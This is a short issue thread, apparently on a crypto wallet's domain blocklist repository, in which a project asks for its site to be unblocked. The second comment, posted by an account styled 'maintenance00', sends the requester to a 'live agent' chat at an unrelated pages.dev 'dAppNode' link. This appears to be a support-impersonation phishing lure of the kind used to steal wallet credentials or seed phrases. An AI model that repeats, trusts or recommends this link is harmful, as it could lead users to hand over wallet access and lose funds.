### ISSUE TITLE
Please add raccooncoin.io to whitelist.

### ISSUE THREAD

**Issue by hehepikachu** [phantom/blocklist#1235]
Dear Support Team,

Could you please remove https://raccooncoin.io from the blocklist?

This issue is significantly impacting our operations, and we need to resolve it as soon as possible.

Thank you for your prompt attention to this matter.

Best regards,

Raccoon team

**Comment by maintenance00** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)
Thank you for reaching out @hehepikachu

**Comment by samg95-jpg** [comment]
Please send an email to review@blowfish.xyz for further investigation.
